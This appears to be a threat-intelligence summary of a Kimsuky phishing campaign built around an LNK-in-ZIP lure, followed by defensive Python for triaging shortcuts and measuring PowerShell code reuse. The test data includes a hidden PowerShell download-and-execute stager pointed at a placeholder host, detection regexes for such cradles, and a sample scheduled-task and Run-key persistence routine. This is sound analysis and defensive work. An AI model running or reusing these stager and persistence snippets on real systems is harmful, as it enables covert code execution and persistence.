Ghost Clients.zip

The attack typically began with emails directed at high-value targets in South Korea, including government officials, academics, and defense contractors.

Pretext: The emails often masqueraded as legitimate communications from South Korean government agencies or think tanks.

Delivery: The email contained either a link to a cloud storage service (such as Google Drive or OneDrive) or an attachment titled Ghost Clients.zip.

Once a user executed the LNK file, a scripted, multi-stage infection process was triggered that was designed to bypass security software.

The payload delivered by that chain had the following capabilities:

Keylogging: Recording every keystroke to capture login credentials and private communications.

Document theft: Searching for and uploading documents with specific extensions (e.g., .hwp, the format of a widely used Korean word processor, as well as .doc and .pdf).

Security researchers attributed this campaign to Kimsuky based on several "fingerprints" found in the code:

Code reuse: The PowerShell scripts used in Ghost Clients.zip shared significant code blocks with previously documented Kimsuky malware such as AppleSeed and Alphabat.
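To triage the lure described above, an analyst needs to see what the shortcut inside the archive actually launches, because Explorer shows only the icon. The following Python script is an added example (not code from the original page, from the campaign, or from the researchers who analysed it): it parses the MS-SHLLINK header and StringData of a .lnk file, decodes a -EncodedCommand payload if one is present, and flags the LNK-to-PowerShell pattern. The shortcut bytes are built by build_lnk() for the example; the target path, the command lines, the example.invalid URL and the rule labels are constructed, not samples from Ghost Clients.zip.

```python
"""Triage a Windows shortcut (.lnk) pulled from a suspicious archive.

Parses the MS-SHLLINK header and StringData so the launch command hidden behind
the icon can be read, then applies heuristics for the LNK-to-PowerShell pattern.
The shortcut bytes are constructed by build_lnk(); nothing here is a campaign file.
"""
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
(HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH,
 HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE) = [1 << i for i in range(8)]
SW_SHOWMINNOACTIVE = 7  # ShowCommand value: open minimised and unfocused
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH), ("working_dir", HAS_WORKDIR),
                 ("arguments", HAS_ARGS), ("icon_location", HAS_ICON))


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a shell link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize or CLSID)")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 0x4C
    if flags & HAS_IDLIST:       # LinkTargetIDList: uint16 size, then the items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:     # LinkInfo: leading uint32 is the size of the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    for field, bit in STRING_FIELDS:   # StringData: uint16 char count, no terminator, fixed order
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        info[field] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
        off += count * width
    return info


LAUNCHER = re.compile(r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|certutil", re.I)
ARG_RULES = (
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden PowerShell window"),
    (re.compile(r"-(ep|ex|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", re.I),
     "download-and-execute primitive"),
)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(arguments: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return the text, or None."""
    m = ENCODED.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_lnk(data: bytes) -> list:
    """Human-readable findings for one shortcut; an empty list means nothing matched."""
    info = parse_lnk(data)
    args = info.get("arguments", "")
    findings = []
    if LAUNCHER.search(info.get("relative_path", "") + " " + info.get("working_dir", "")):
        findings.append("target is a script host / LOLBin: " + info.get("relative_path", ""))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window kept out of view)")
    decoded = decode_encoded_command(args)
    if decoded is not None:
        findings.append("encoded command decodes to: " + decoded)
    for rule, label in ARG_RULES:    # check the visible arguments and the decoded payload
        if rule.search(args) or (decoded is not None and rule.search(decoded)):
            findings.append(label)
    return findings


def build_lnk(relative_path: str, arguments: str = "", show_command: int = 1) -> bytes:
    """Minimal unicode shell link (no IDList/LinkInfo). Constructed test data, not a campaign artefact."""
    flags = HAS_RELPATH | IS_UNICODE | (HAS_ARGS if arguments else 0)
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0x20)      # size, CLSID, LinkFlags, FILE_ATTRIBUTE_ARCHIVE
    header += b"\0" * 24                                               # creation/access/write FILETIMEs
    header += struct.pack("<IiIHHII", 0, 0, show_command, 0, 0, 0, 0)  # FileSize, IconIndex, ShowCommand, HotKey, reserved
    string_data = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + string_data(relative_path) + (string_data(arguments) if arguments else b"")


PS_PATH = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed lure-style shortcuts: one with a plain stager command line, one with -enc.
LURE_LNK = build_lnk(PS_PATH, "-w hidden -ep bypass -nop -c \"iex (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/s')\"", SW_SHOWMINNOACTIVE)
ENCODED_LNK = build_lnk(PS_PATH, "-nop -w hidden -enc " +
                        base64.b64encode("IEX 'stage2'".encode("utf-16-le")).decode(), SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\notepad.exe")

if __name__ == "__main__":
    for name, blob in (("lure", LURE_LNK), ("encoded", ENCODED_LNK), ("benign", BENIGN_LNK)):
        print(name, "->", triage_lnk(blob) or "no findings")
```

The parser deliberately stops after StringData: the ExtraData blocks that follow are where environment-variable and console-property tricks live, and a real triage tool should dump them too, but the StringData fields are where the hidden command line is. Treat a document-looking archive member whose shortcut resolves to a script host, requests a hidden or unfocused window, or carries an encoded command as a lure until proven otherwise.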
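Code-reuse fingerprinting of the kind the attribution above relies on can be made measurable rather than eyeballed. The following Python is an added example; it is not the researchers' tooling, and the three scripts inside it are constructed placeholders, not AppleSeed, Alphabat or Ghost Clients.zip code. Scripts are canonicalised (comments dropped, string literals masked, case and whitespace folded, variables renumbered per window) and compared as sets of k-line windows, so renamed variables, changed URLs and re-cased cmdlets do not hide a shared block. The family names and the k=3 window size are assumptions made for the example.

```python
"""Measure shared code blocks between a new PowerShell sample and reference scripts.

All three scripts below are constructed for the example; none is code from any
real malware family. A persistence routine is reused between NEW_SAMPLE and
REFERENCE_FAMILY with different variable names, strings and casing.
"""
import re

STRING_LITERAL = re.compile(r"'[^']*'|\"[^\"]*\"")
VARIABLE = re.compile(r"\$([a-z_][a-z0-9_]*)")
AUTOMATIC = {"_", "null", "true", "false", "env", "args", "psitem", "error", "home", "pwd"}


def normalize_lines(script: str) -> list:
    """One canonical string per non-empty, non-comment line (line comments only; <# #> blocks are not handled)."""
    out = []
    for raw in script.splitlines():
        line = STRING_LITERAL.sub('"<str>"', raw)   # mask literals first: a '#' inside one is not a comment
        line = line.split("#", 1)[0].lower()
        line = " ".join(line.split())
        if line:
            out.append(line)
    return out


def canonical_window(lines) -> str:
    """Join k lines and renumber user variables by first appearance within the window."""
    names = {}

    def rename(m):
        name = m.group(1)
        if name in AUTOMATIC:          # keep $_, $env:, $null and friends as they are
            return m.group(0)
        return "$v%d" % names.setdefault(name, len(names))

    return VARIABLE.sub(rename, " | ".join(lines))


def windows(script: str, k: int = 3) -> set:
    """Set of canonical k-line windows (shingles) for a script."""
    lines = normalize_lines(script)
    return {canonical_window(lines[i:i + k]) for i in range(len(lines) - k + 1)}


def shared_blocks(sample: str, reference: str, k: int = 3) -> list:
    """The canonical windows that occur in both scripts."""
    return sorted(windows(sample, k) & windows(reference, k))


def similarity(sample: str, reference: str, k: int = 3) -> float:
    """Jaccard similarity of the two window sets."""
    a, b = windows(sample, k), windows(reference, k)
    return len(a & b) / len(a | b) if (a | b) else 0.0


def attribute(sample: str, families: dict, k: int = 3) -> dict:
    """Score a sample against every reference family: {name: (similarity, shared window count)}."""
    return {name: (round(similarity(sample, ref, k), 3), len(shared_blocks(sample, ref, k)))
            for name, ref in families.items()}


# Constructed reference script: a scheduled-task plus Run-key persistence routine.
REFERENCE_FAMILY = r"""
$TaskName = "UpdateCheck"
$Action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-w hidden -f C:\Users\Public\up.ps1"
$Trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "C:\Users\Public\up.ps1"
"""

# Constructed new sample: same routine, renamed variables, new strings, extra lines around it.
NEW_SAMPLE = r"""
# collector bootstrap
$cfg = 'http://example.invalid/cfg'
$tn = "SystemCheck"
$act = new-scheduledtaskaction -execute "pwsh.exe" -argument "-w hidden -f C:\ProgramData\s.ps1"   # same routine
$trg = New-ScheduledTaskTrigger -AtLogOn
register-scheduledtask -taskname $tn -action $act -trigger $trg -force
set-itemproperty -path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -name "Sync" -value "C:\ProgramData\s.ps1"
Get-ChildItem $env:USERPROFILE -Recurse -Include *.hwp,*.pdf
"""

# Constructed unrelated script: shares no logic with the sample.
UNRELATED_FAMILY = r"""
$files = Get-ChildItem -Path C:\Logs -Filter *.log
foreach ($f in $files) { Write-Output $f.Length }
Write-Output "done"
"""

if __name__ == "__main__":
    families = {"family_a": REFERENCE_FAMILY, "family_b": UNRELATED_FAMILY}
    print(attribute(NEW_SAMPLE, families))
    for block in shared_blocks(NEW_SAMPLE, REFERENCE_FAMILY):
        print("shared:", block)
```

Masking string literals is what makes the comparison survive a new C2 URL or drop path, and per-window variable renumbering is what makes it survive a rename pass; neither defeats a genuine rewrite, which is the point: matching windows indicate copied logic, not merely similar intent. Similarity alone is weak evidence for attribution, since common boilerplate (a Run-key write, a download cradle) is shared across unrelated actors; it is the combination with other fingerprints that the attribution above rests on.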